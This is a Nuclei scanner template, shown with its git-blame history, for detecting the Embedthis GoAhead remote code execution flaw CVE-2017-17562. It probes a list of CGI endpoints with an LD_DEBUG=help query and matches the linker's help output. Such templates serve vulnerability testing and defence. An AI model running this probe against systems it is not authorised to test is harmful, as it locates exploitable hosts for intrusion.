nuclei-templates/cves/2017/CVE-2017-17562.yaml

id: CVE-2017-17562

info:
  name: Embedthis GoAhead RCE
  description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
  author: geeknik
  reference:
    - https://www.elttam.com/blog/goahead/
    - https://github.com/ivanitlearning/CVE-2017-17562
    - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
  severity: high
  tags: cve,cve2017,rce,embedthis,goahead,fuzz

requests:
  - raw:
      - |
        GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    payloads:
      endpoint:
        - admin
        - apply
        - non-CA-rev
        - cgitest
        - checkCookie
        - check_user
        - chn/liveView
        - cht/liveView
        - cnswebserver
        - config
        - configure/set_link_neg
        - configure/swports_adjust
        - eng/liveView
        - firmware
        - getCheckCode
        - get_status
        - getmac
        - getparam
        - guest/Login
        - home
        - htmlmgr
        - index
        - index/login
        - jscript
        - kvm
        - liveView
        - login
        - login.asp
        - login/login
        - login/login-page
        - login_mgr
        - luci
        - main
        - main-cgi
        - manage/login
        - menu
        - mlogin
        - netbinary
        - nobody/Captcha
        - nobody/VerifyCode
        - normal_userLogin
        - otgw
        - page
        - rulectl
        - service
        - set_new_config
        - sl_webviewer
        - ssi
        - status
        - sysconf
        - systemutil
        - t/out
        - top
        - unauth
        - upload
        - variable
        - wanstatu
        - webcm
        - webmain
        - webproc
        - webscr
        - webviewLogin
        - webviewLogin_m64
        - webviewer
        - welcome

    attack: sniper
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "environment variable"
          - "display library search paths"
        condition: and
Create CVE-2017-17562.yaml WIP 2021-03-27 21:22:33 +00:00			`id: CVE-2017-17562`

			`info:`
			`name: Embedthis GoAhead RCE`
			`description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.`
			`author: geeknik`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Create CVE-2017-17562.yaml WIP 2021-03-27 21:22:33 +00:00			`- https://www.elttam.com/blog/goahead/`
			`- https://github.com/ivanitlearning/CVE-2017-17562`
minor changes 2021-04-01 07:58:30 +00:00			`- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562`
Create CVE-2017-17562.yaml WIP 2021-03-27 21:22:33 +00:00			`severity: high`
minor changes 2021-04-01 07:58:30 +00:00			`tags: cve,cve2017,rce,embedthis,goahead,fuzz`
Create CVE-2017-17562.yaml WIP 2021-03-27 21:22:33 +00:00
			`requests:`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00			`- raw:`
			`- \|`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00			`GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00			`Host: {{Hostname}}`
			`Accept: /`

			`payloads:`
Create CVE-2017-17562.yaml WIP 2021-03-27 21:22:33 +00:00			`endpoint:`
			`- admin`
			`- apply`
			`- non-CA-rev`
			`- cgitest`
			`- checkCookie`
			`- check_user`
			`- chn/liveView`
			`- cht/liveView`
			`- cnswebserver`
			`- config`
			`- configure/set_link_neg`
			`- configure/swports_adjust`
			`- eng/liveView`
			`- firmware`
			`- getCheckCode`
			`- get_status`
			`- getmac`
			`- getparam`
			`- guest/Login`
			`- home`
			`- htmlmgr`
			`- index`
			`- index/login`
			`- jscript`
			`- kvm`
			`- liveView`
			`- login`
			`- login.asp`
			`- login/login`
			`- login/login-page`
			`- login_mgr`
			`- luci`
			`- main`
			`- main-cgi`
			`- manage/login`
			`- menu`
			`- mlogin`
			`- netbinary`
			`- nobody/Captcha`
			`- nobody/VerifyCode`
			`- normal_userLogin`
			`- otgw`
			`- page`
			`- rulectl`
			`- service`
			`- set_new_config`
			`- sl_webviewer`
			`- ssi`
			`- status`
			`- sysconf`
			`- systemutil`
			`- t/out`
			`- top`
			`- unauth`
			`- upload`
			`- variable`
			`- wanstatu`
			`- webcm`
			`- webmain`
			`- webproc`
			`- webscr`
			`- webviewLogin`
			`- webviewLogin_m64`
			`- webviewer`
			`- welcome`

minor changes 2021-04-01 07:58:30 +00:00			`attack: sniper`
Added stop-at-first-match in applicable templates 2021-09-02 11:59:10 +00:00			`stop-at-first-match: true`
Create CVE-2017-17562.yaml WIP 2021-03-27 21:22:33 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
Update CVE-2017-17562.yaml 2021-03-29 20:04:26 +00:00			`- "environment variable"`
			`- "display library search paths"`
			`condition: and`